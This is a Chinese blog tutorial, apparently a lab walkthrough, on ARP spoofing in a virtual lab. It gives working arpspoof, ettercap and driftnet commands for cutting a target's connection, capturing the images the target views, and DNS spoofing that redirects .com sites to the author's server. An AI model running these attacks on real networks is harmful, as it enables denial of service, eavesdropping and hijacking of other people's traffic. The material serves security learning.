我不会RAP,但我会ARP——老欢
环境:
- 攻击机:kali linux (ip地址:192.168.204.128)
- 靶机:windows server 2003(IP地址:192.168.204.132)
以上均是虚拟机环境,网络模式为NAT模式
检验虚拟机之间的网络是否连通
![7b4fa0680b9ce416de0461d3de7790c1.png](https://i-blog.csdnimg.cn/blog_migrate/fc947673e5f9f8b80105cb17679e7720.jpeg)
ARP断网攻击
在终端输入命令:arpspoof -i eth0 -t 192.168.204.132 192.168.204.2
命令解释:
-i 指定网卡
-t 指定目标ip
这里的192.168.204.2是网关
![b0888f250ea88eb2e667e8d0c043a1e7.png](https://i-blog.csdnimg.cn/blog_migrate/556f7b23aedf62ac773a6ada229cc456.jpeg)
欺骗开始,我们来看看靶机,靶机已经无法上网,无法访问百度了。
![a406e80beebafe68edb732df4b8d07be.png](https://i-blog.csdnimg.cn/blog_migrate/4c90179dcd9483d1a15f41580c6a865c.jpeg)
接下来我们按ctrl+c停止arp欺骗,靶机又能上网了
![0062f86f57477cd1d1719096e98f8496.png](https://i-blog.csdnimg.cn/blog_migrate/e5abe6481f0aa5909756111aa2d42e6e.jpeg)
2.捕获靶机浏览的图片
在终端输入命令:ettercap -i eth0 -Tq -M arp:remote /192.168.204.132// /192.168.204.2//
eth0是网卡
192.168.204.132是靶机地址
192.168.204.2是网关地址
![bab0f9e68242b15a4bc9faefbb89236d.png](https://i-blog.csdnimg.cn/blog_migrate/14d6f7aac20076682a1d460528865a1b.jpeg)
开启图片嗅探 driftnet -i eth0 -a -d /root/pictures
这里将嗅探到的图片存到root目录下的pictures文件夹里
接下来我们在靶机上面随便浏览一些图片,然后我们打开kali机的pictures文件夹,所有的图片已经被抓取到,所以少看不该看的图片!
![63c1fe0fa767e3a8273d28afe193cedf.png](https://i-blog.csdnimg.cn/blog_migrate/9bbbd1c946b217339d7321ec1bb97c15.jpeg)
3.DNS欺骗
首先执行命令leafpad /etc/ettercap/etter.dns
在这个文件里加上这么一句 *.*.com A 39.108.146.75(这里的ip地址是403工作室的ip)
![da34c46714c581608978b46c95549a7c.png](https://i-blog.csdnimg.cn/blog_migrate/f57204ed1ea1400d6ed500d41a969286.jpeg)
执行命令 ettercap -i eth0 -Tq -P dns_spoof /192.168.204.132// /192.168.204.2//
![5bd6948e51b835a020b13c509d8328f6.png](https://i-blog.csdnimg.cn/blog_migrate/98f600a5f72c38addc38984bf04ea2db.jpeg)
回到靶机,在url上输人http://www.163.com来访问一下网易
![f003f252d9a09e7fcd1ce9eb9462c188.png](https://i-blog.csdnimg.cn/blog_migrate/0e29e3975f5d24a15510f1ecff40a95f.png)
当我回车访问那一刻,它跳转到了403工作室
![db7f9004efbd3655fb6bfac6bb7fdff9.png](https://i-blog.csdnimg.cn/blog_migrate/3391841958165b840fb49fe9aa991896.jpeg)
经过试验,这里的dns欺骗对一些大型网站不起作用,可能是做了防dns欺骗的措施
本文仅供测试娱乐,请勿用于实际环境。
中间人攻击之ARP欺骗 - 403工作室laohuan.art![090db8ee64b3050ded9b7ed003212662.png](https://i-blog.csdnimg.cn/blog_migrate/8407e18371119e94690d9ec969670aa8.jpeg)